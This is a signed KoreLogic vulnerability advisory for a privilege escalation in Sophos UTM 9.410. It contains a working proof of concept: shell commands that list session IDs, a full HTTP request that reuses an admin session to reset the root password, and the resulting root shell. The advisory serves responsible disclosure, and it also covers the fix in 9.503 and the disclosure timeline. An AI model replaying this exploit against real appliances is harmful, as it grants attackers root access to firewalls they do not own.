-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 KL-001-2017-020 : Sophos UTM 9 loginuser Privilege Escalation via Insecure Directory Permissions Title: Sophos UTM 9 loginuser Privilege Escalation via Insecure Directory Permissions Advisory ID: KL-001-2017-020 Publication Date: 2017.10.24 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-020.txt 1. Vulnerability Details Affected Vendor: Sophos Affected Product: UTM 9 Affected Version: 9.410 Platform: Embedded Linux CWE Classification: CWE-280: Improper Handling of Insufficient Permissions or Privileges Impact: Root Access Attack vector: SSH 2. Vulnerability Description The attacker must know the password for the loginuser account. The confd client is not available to the loginuser account. However, it is possible to list a directory containing a sub-directories whose names are valid session identifiers (SID) and can be used to make requests on behalf of other accounts, such as admin. This allows for escalation to root privilege. 3. Technical Description 1. Obtain the a privileged session token $ ssh loginuser@1.3.3.7 loginuser@1.3.3.7's password: Sophos UTM (C) Copyright 2000-2016 Sophos Limited and others. All rights reserved. Sophos is a registered trademark of Sophos Limited and Sophos Group. All other product and company names mentioned are trademarks or registered trademarks of their respective owners. For more copyright information look at /doc/astaro-license.txt or http://www.astaro.com/doc/astaro-license.txt NOTE: If not explicitly approved by Sophos support, any modifications done by root will void your support. loginuser@[redacted]:/home/login > cd /var/confd/var/sessions/ loginuser@[redacted]:/var/confd/var/sessions > ls -la total 40 drwxr-xr-x 2 root root 4096 Mar 23 14:53 . drwxr-xr-x 5 root root 4096 Mar 19 16:06 .. -rw-r--r-- 1 root root 359 Mar 23 14:47 qpmNEByQxJGYYWTvRyVC -rw-r--r-- 1 root root 5 Mar 23 14:47 qpmNEByQxJGYYWTvRyVC.lock -rw-r--r-- 1 root root 369 Mar 23 14:52 SxAIqVdVmexIEdQYHvHk -rw-r--r-- 1 root root 35 Mar 23 14:52 SxAIqVdVmexIEdQYHvHk.lock -rw-r--r-- 1 root root 367 Mar 23 14:47 VbYBGlcwaLVDnzEuFCwP -rw-r--r-- 1 root root 10 Mar 23 14:47 VbYBGlcwaLVDnzEuFCwP.lock -rw-r--r-- 1 root root 370 Mar 23 14:47 xZzeOIhVClqKYsmCKHrN -rw-r--r-- 1 root root 5 Mar 23 14:47 xZzeOIhVClqKYsmCKHrN.lock 2. Set the root password POST /webadmin.plx HTTP/1.1 Host: 1.3.3.7:4444 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/javascript, text/html, application/xml, text/xml, */* Accept-Language: en-US,en;q=0.5 X-Requested-With: XMLHttpRequest X-Prototype-Version: 1.5.1.1 Content-Type: application/json; charset=UTF-8 Referer: https://1.3.3.7:4444/ Content-Length: 418 Cookie: SID=xZzeOIhVClqKYsmCKHrN DNT: 1 Connection: close {"objs": [{"ack": null, "elements": {"root_pw_1": "newroot", "root_pw_2": "newroot", "loginuser_pw_1": "loginuser", "loginuser_pw_2": "loginuser"}, "FID": "system_settings_shell"}], "SID": "xZzeOIhVClqKYsmCKHrN", "browser": "gecko", "backend_version": "2", "loc": "english", "_cookie": null, "wdebug": 0, "RID": "1490305723111_0.8089407793028881", "current_uuid": "2844879a-e014-11da-b3ae-0014221e9eba", "ipv6": false} HTTP/1.1 200 OK Date: Thu, 23 Mar 2017 14:57:19 GMT Server: Apache Expires: Thursday, 01-Jan-1970 00:00:01 GMT Pragma: no-cache X-Frame-Options: SAMEORIGIN X-Content-Type-Option: nosniff X-XSS-Protection: 1; mode=block Vary: Accept-Encoding Connection: close Content-Type: application/json; charset=utf-8 Content-Length: 24690 {"SID":"xZzeOIhVClqKYsmCKHrN","ipv6":false,"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba","browser":"gecko","RID":"1490305723111_0.8089407793028881","js":"cache_update();if($(\"topbar_icon\")){$(\"topbar_icon\").src=\"core/img/topbar/topbar_user.png\";}toggle_who_is_watching(0);","backend_version":"2","loc":"english","globals_data":["xZzeOIhVClqKYsmCKHrN","5",[]],"globals":["SID","backend_version","backend_objects_update"],"objs":[{"success":[{"text":"Shell user password(s) set successfully."}],"current_uuid":"2844879a-e014-11da-b3ae-0014221e9eba", [snip] "_cookie":null,"wdebug":0} 3. Look for success message. "objs":[{"success":[{"text":"Shell user password(s) set successfully."}] 4. Profit. loginuser@[redacted]:/home/login > su Password: [redacted]:/home/login # id uid=0(root) gid=0(root) groups=0(root),890(xorp) 4. Mitigation and Remediation Recommendation The vendor has addressed this vulnerability in version 9.503. Release notes and download instructions can be found at: https://community.sophos.com/products/unified-threat-management/b/utm-blog/posts/utm-up2date-9-503-released 5. Credit This vulnerability was discovered by Matt Bergin (@thatguylevel) of KoreLogic, Inc. 6. Disclosure Timeline 2017.07.21 - KoreLogic submits vulnerability details to Sophos. 2017.07.21 - Sophos acknowledges receipt. 2017.09.01 - 30 business days have elapsed since the vulnerability was reported to Sophos. 2017.09.15 - KoreLogic requests an update on the status of this and other vulnerabilities reported to Sophos. 2017.09.18 - Sophos informs KoreLogic that this issue has been remediated in release 9.503 for UTM. 2017.10.24 - KoreLogic public disclosure. 7. Proof of Concept See 3. Technical Description. The contents of this advisory are copyright(c) 2017 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt -----BEGIN PGP SIGNATURE----- iQFOBAEBCAA4FiEE+cSrtp5jQJEtra70TWWaLA4ZiQwFAlnvpzcaHGRpc2Nsb3N1 cmVzQGtvcmVsb2dpYy5jb20ACgkQTWWaLA4ZiQzHHQf+JBCm5hnxKkEiFIlnB8Qm foMlSy24cMFZT/z+TI47p8neFoqdrn2HmXuftgUDuCmLQaNga0kPQ+NqY4yYosAz G8om9FXNwA0qCpjY41PCwjh8+32KNksKd8WoNsDTk3fzGqktekh/a77SznS6uhIk uv04ruK7Hz4CO9tDfNk+D+eDqjmWIkKRQN2W9F8Li5AHsoHmKahvnzP2Hb5z85zD GzUdynEYiEA2SjsqXf6GvVPD7u4DYCn6no7fd/LEngUi6WSU0/Jx4V5vGJMrIqjX Sd9dsnradFzEtRwkDr9XtpGD93uyUJVEfyfZzQ6Q22A0RU8f38Au/HjoBCAtfRAJ pQ== =Y3kf -----END PGP SIGNATURE-----